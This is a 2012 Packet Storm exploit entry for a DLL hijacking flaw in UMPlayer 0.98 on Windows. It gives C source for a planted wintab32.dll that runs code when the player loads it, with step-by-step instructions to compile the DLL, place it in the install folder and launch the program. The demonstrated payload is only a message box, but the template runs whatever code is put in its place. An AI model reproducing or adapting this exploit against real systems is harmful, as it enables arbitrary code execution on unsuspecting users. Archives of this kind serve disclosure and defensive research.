UMPlayer 0.98 DLL Hijacking

2012-10-31T00:00:00
ID PACKETSTORM:117791
Type packetstorm
Reporter Metropolis
Modified 2012-10-31T00:00:00

Description

                                        
                                            `/*  
# Exploit Title: UMPlayer 0.98 DLL Hijacking Exploit (wintab32.dll)  
# Date: 31/10/2012  
# Author: Metropolis  
# Url: http://metropolis.fr.cr  
# Software info: UMPlayer is the media player that fills all your needs.   
# With dozens of advanced features and built-in codecs it can handle any media format.  
# Software Link: http://www.umplayer.com/download/  
# Version: 0.98   
# Tested on: Windows 7  
# Instructions:  
# 1. Compile dll   
# gcc -shared -o wintab32.dll wintab32.c  
# 2. Add wintab32.dll  
# C:\Program Files (x86)\UMPlayer  
# 3. Launch UMPlayer.exe  
# 4. MessageBox DLL Hijacked!   
*/  
#include <windows.h>  
  
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
dll_mll();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
  
return TRUE;  
}  
  
int dll_mll()  
{  
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);  
}  
`